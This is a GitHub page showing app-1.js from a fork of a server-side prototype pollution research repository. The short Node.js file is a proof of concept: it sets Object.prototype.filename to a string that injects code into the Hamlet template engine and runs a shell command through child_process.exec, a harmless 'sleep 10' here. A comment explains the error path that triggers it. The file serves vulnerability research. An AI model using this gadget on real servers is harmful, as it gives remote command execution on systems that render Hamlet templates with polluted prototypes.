forked from KTH-LangSec/server-side-prototype-pollution
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathapp-1.js
More file actions
22 lines (18 loc) · 629 Bytes
/
app-1.js
File metadata and controls
22 lines (18 loc) · 629 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
const Hamlet = require('hamlet').hamlet;
const templateString = `<body>
<p>Some paragraph.
<ul>
<li>Item 1
<li>Item 2
<.foo>
<span#bar data-attr=#{foo}>baz # this is a comment`
Object.prototype.filename = "' + global.process.mainModule.require(\'child_process\').exec(\'bash -c \"sleep 10\"\'); + '"
/*
This requries trigger an error in the render stage as the inject code is in the catch block
This is fairly commonly seen scanrio if the server is passing user inputs as the data of function while they are missing a required variable (e.g. foo)
*/
try{
Hamlet(templateString, {})
}catch(e){
;
}